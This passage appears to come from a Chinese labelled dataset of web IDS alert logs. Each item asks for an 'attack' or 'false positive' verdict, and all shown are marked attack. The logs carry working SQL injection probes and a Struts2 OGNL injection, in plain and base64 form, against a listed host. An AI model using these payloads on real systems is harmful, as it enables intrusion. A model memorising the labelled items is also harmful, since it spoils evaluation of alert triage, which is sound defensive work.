"SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击:\r\n\r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n\r\n2.部署Web应用防火墙;\r\n\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9pbmRleC5waHA/bT1Hb29kcyZhPXNob3djYXRlJmlkPTEwMyUyMFVOSU9OJTIwQUxMJTIwU0VMRUNUJTIwQ09OQ0FUJTI4bWQ1KDIwNTEzOTU3MSklMjklMjMgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_a20155a2ceb590a9587b7f2918bd70cd", "access_time": "2024-11-27 14:16:52", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(205139571)%29%23 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569449-SQL注入攻击(机器学习)", "rule_labels": "{}", "sport": "12876", "h_url": "/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(205139571)%29%23"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688211", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688211, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 5, "uri": "/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(205139571)%29%23", "dport": 30001, "vuln_name": "SQL注入(词法语法)", "rsp_status": 0, "code_language": "通用", "solution": "如下一些方法能够防止注入攻击: 1.在网页代码中需要对用户输入的数据进行严格过滤。 2.部署Web应用防火墙 。 3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 0, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2019-10-18 10:02:18", "sport": 12876}, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "api": "218.76.15.56:30001/index.php", "id": "103 UNION ALL SELECT CONCAT(md5(205139571))#", "first_access_time": "2024-11-27 14:16:51", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入(词法语法)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "0c834ea89e266ad5c96cd6752cfa6fc4", "xff": "", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688191", "code_language": "通用", "public_date": "2019-10-18 10:02:18", "skyeye_serial_num": "QbJK/8ze/", "a": "showcate", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "5", "h_proto_version": "HTTP/1.1", "uri": "/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(205139571)%29%23", "m": "Goods", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002072c", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入(词法语法)", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击: 1.在网页代码中需要对用户输入的数据进行严格过滤。 2.部署Web应用防火墙 。 3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9pbmRleC5waHA/bT1Hb29kcyZhPXNob3djYXRlJmlkPTEwMyUyMFVOSU9OJTIwQUxMJTIwU0VMRUNUJTIwQ09OQ0FUJTI4bWQ1KDIwNTEzOTU3MSklMjklMjMgSFRUUC8xLjENCkhvc3Q6IDIxOC43Ni4xNS41NjozMDAwMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgcnY6NzguMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83OC4wDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_a26776019a957230db5d282c662a3d49", "access_time": "2024-11-27 14:16:51", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "223.160.174.104", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(205139571)%29%23 HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568364-SQL注入(词法语法)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12876", "h_url": "/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5(205139571)%29%23"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688207", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688207, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.23.68.194", "site_app": "通用", "hit_end": 20, "uri": "/index.php?m=member&f=login_save", "dport": 30001, "vuln_name": "SQL注入(词法语法)", "rsp_status": 0, "code_language": "通用", "solution": "如下一些方法能够防止注入攻击: 1.在网页代码中需要对用户输入的数据进行严格过滤。 2.部署Web应用防火墙 。 3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 0, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2019-10-18 10:02:18", "sport": 12869}, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "api": "218.76.15.56:30001/index.php", "first_access_time": "2024-11-27 14:16:47", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入(词法语法)", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "0c834ea89e266ad5c96cd6752cfa6fc4", "xff": "", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02020000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688187", "code_language": "通用", "public_date": "2019-10-18 10:02:18", "skyeye_serial_num": "QbJK/8ze/", "f": "login_save", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "20", "h_proto_version": "HTTP/1.1", "uri": "/index.php?m=member&f=login_save", "m": "member", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002072c", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入(词法语法)", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击: 1.在网页代码中需要对用户输入的数据进行严格过滤。 2.部署Web应用防火墙 。 3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvaW5kZXgucGhwP209bWVtYmVyJmY9bG9naW5fc2F2ZSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkNvbnRlbnQtTGVuZ3RoOiAxMDQNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "dXNlcm5hbWU9ZGQnIG9yIGV4dHJhY3R2YWx1ZSgweDBhLGNvbmNhdCgweDBhLDk5NjI3ODQwNCo5NTc3ODk4ODkpKSMmcGFzc3dvcmQ9ZGQmc3VibWl0PSslQjUlQzcrJUMyJUJDKwo=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_a26776019a957230db5d282c662a3d49", "access_time": "2024-11-27 14:16:47", "content-length": "104", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /index.php?m=member&f=login_save HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 104\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "username=dd' or extractvalue(0x0a,concat(0x0a,996278404*957789889))#&password=dd&submit=+%B5%C7+%C2%BC+\n", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268568364-SQL注入(词法语法)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12869", "h_url": "/index.php?m=member&f=login_save"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688207", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "SQL注入", "_origin": {"write_date": 1732688207, "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "其他", "hit_end": 28, "uri": "/index.php?m=member&f=login_save", "dport": 30001, "vuln_name": "SQL注入攻击", "rsp_status": 0, "code_language": "其他", "solution": "如下一些方法能够防止注入攻击: \r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": 8, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "public_date": "2018-11-14 00:00:00", "sport": 12869}, "detail_info": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "file_md5": "828e0013b8f3bc1bb22b4f57172b019d", "rule_key": "webids", "api": "218.76.15.56:30001/index.php", "first_access_time": "2024-11-27 14:16:47", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "SQL注入攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "d95311ac09b19ed6a8082cf335c46018", "xff": "", "vuln_desc": "SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。在用于SQL查询前缺少过滤,提交恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。", "attack_chain": "0x02010000", "vuln_harm": "被SQL注入后可能导致以下后果: 1.网页被篡改; 2.数据被篡改; 3.核心数据被窃取; 4.数据库所在服务器被攻击变成傀儡主机。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688187", "code_language": "其他", "public_date": "2018-11-14 00:00:00", "skyeye_serial_num": "QbJK/8ze/", "f": "login_save", "site_app": "其他", "super_attack_chain": "0x02000000", "hit_end": "28", "h_proto_version": "HTTP/1.1", "uri": "/index.php?m=member&f=login_save", "m": "member", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10001213", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "SQL注入攻击", "attack_type": "SQL注入", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "如下一些方法能够防止注入攻击: \r\n1.在网页代码中需要对用户输入的数据进行严格过滤;\r\n2.部署Web应用防火墙;\r\n3.对数据库操作进行监控建议过滤用户输入的数据,切记用户的所有输入都要认为是不安全的。", "hit_start": "8", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvaW5kZXgucGhwP209bWVtYmVyJmY9bG9naW5fc2F2ZSBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjU2OjMwMDAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo3OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94Lzc4LjANCkNvbnRlbnQtTGVuZ3RoOiAxMDQNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KRG50OiAxDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K", "req_body": "dXNlcm5hbWU9ZGQnIG9yIGV4dHJhY3R2YWx1ZSgweDBhLGNvbmNhdCgweDBhLDk5NjI3ODQwNCo5NTc3ODk4ODkpKSMmcGFzc3dvcmQ9ZGQmc3VibWl0PSslQjUlQzcrJUMyJUJDKwo=", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_8f0fd2f127e0aa0dc2a9f480a8338990", "access_time": "2024-11-27 14:16:47", "content-length": "104", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16010000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded", "sip": "223.160.174.104", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /index.php?m=member&f=login_save HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 104\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: application/x-www-form-urlencoded\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "username=dd' or extractvalue(0x0a,concat(0x0a,996278404*957789889))#&password=dd&submit=+%B5%C7+%C2%BC+\n", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268440083-SQL注入攻击", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/10\", \"software\": \"Firefox/78.0\", \"hw_type\": \"PC\"}}", "sport": "12869", "h_url": "/index.php?m=member&f=login_save"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732688207", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "非授权访问/权限绕过", "_origin": {"write_date": 1732688207, "vuln_harm": "攻击者在调用java的一些类(如java.lang.Runtime)进行攻击的时候,为了绕过waf 的检测,会对这些类进行处理。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_body", "dip": "172.23.68.194", "site_app": "", "hit_end": 166, "uri": "/", "dport": 30001, "vuln_name": "发现java可疑类绕过攻击", "rsp_status": 0, "code_language": "", "solution": "修复漏洞,升级应用到安全版本。", "hit_start": 146, "detail_info": "攻击者在调用java的一些类(如java.lang.Runtime)进行攻击的时候,为了绕过waf 的检测,会对这些类进行处理。", "xff": "", "sip": "223.160.174.104", "vuln_desc": "攻击者在调用java的一些类(如java.lang.Runtime)进行攻击的时候,为了绕过waf 的检测,会对这些类进行处理。", "public_date": "2023-03-31 14:48:06", "sport": 12867}, "detail_info": "攻击者在调用java的一些类(如java.lang.Runtime)进行攻击的时候,为了绕过waf 的检测,会对这些类进行处理。", "file_md5": "", "rule_key": "webids", "api": "218.76.15.56:30001/", "first_access_time": "2024-11-27 14:16:47", "hazard_level": "8", "hazard_rating": "危急", "hit_field": "req_body", "h_method": "POST", "sip_addr": "中国--北京市--北京市", "dnt": "1", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现java可疑类绕过攻击", "alarm_sip": "172.23.68.194", "skyeye_index": "", "sip_ioc_dip": "f9d6836af116cb3e42e1e9f86c0767d5", "xff": "", "vuln_desc": "攻击者在调用java的一些类(如java.lang.Runtime)进行攻击的时候,为了绕过waf 的检测,会对这些类进行处理。", "attack_chain": "0x02020000", "vuln_harm": "攻击者在调用java的一些类(如java.lang.Runtime)进行攻击的时候,为了绕过waf 的检测,会对这些类进行处理。", "dport": "30001", "alert_devip": "172.31.191.57", "update_time": "1732688189", "code_language": "", "public_date": "2023-03-31 14:48:06", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "166", "h_proto_version": "HTTP/1.1", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020bd6", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "223.160.174.104", "host_md5": "be03eee78fc4ed0ad67ea6194767e892", "accept-encoding": "gzip", "user-agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "vlan_id": "", "vuln_type": "发现java可疑类绕过攻击", "attack_type": "非授权访问/权限绕过", "is_web_attack": "1", "dip": "172.23.68.194", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "修复漏洞,升级应用到安全版本。", "hit_start": "146", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvIEhUVFAvMS4xDQpIb3N0OiAyMTguNzYuMTUuNTY6MzAwMDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IHJ2Ojc4LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzguMA0KQ29udGVudC1MZW5ndGg6IDMzNg0KQWNjZXB0OiAqLyoNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9MjlmNmFmMGVlYjdkY2NiY2M5YjdmZDRkYTNjNzRjZDhlNzI0YWNiMWIzYWY1OTA0ZGNhMzZhMGRmNzczDQpEbnQ6IDENClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo=", "req_body": "LS0yOWY2YWYwZWViN2RjY2JjYzliN2ZkNGRhM2M3NGNkOGU3MjRhY2IxYjNhZjU5MDRkY2EzNmEwZGY3NzMNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXBsb2FkIjsgZmlsZW5hbWU9IiV7I2NvbnRleHRbJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXNwb25zZSddLmFkZEhlYWRlcignWC1SRVMnLDQxMzM1KjQzMDU4KX0AYiINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQoNCg0KLS0yOWY2YWYwZWViN2RjY2JjYzliN2ZkNGRhM2M3NGNkOGU3MjRhY2IxYjNhZjU5MDRkY2EzNmEwZGY3NzMtLQ0K", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.56:30001", "host_state": "失败", "accept-language": "en-US,en;q=0.9", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_f3800c33b57e43eb3577caa47125b4e0", "access_time": "2024-11-27 14:16:47", "content-length": "336", "attack_addr": "中国--北京市--北京市(39.902798/116.401159)", "type_chain": "16040000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "multipart/form-data; boundary=29f6af0eeb7dccbcc9b7fd4da3c74cd8e724acb1b3af5904dca36a0df773", "sip": "223.160.174.104", "dimension": "3", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST / HTTP/1.1\r\nHost: 218.76.15.56:30001\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0\r\nContent-Length: 336\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.9\r\nContent-Type: multipart/form-data; boundary=29f6af0eeb7dccbcc9b7fd4da3c74cd8e724acb1b3af5904dca36a0df773\r\nDnt: 1\r\nUpgrade-Insecure-Requests: 1\r\nAccept-Encoding: gzip\r\n\r\n", "req_body": "--29f6af0eeb7dccbcc9b7fd4da3c74cd8e724acb1b3af5904dca36a0df773\r\nContent-Disposition: form-data; name=\"upload\"; 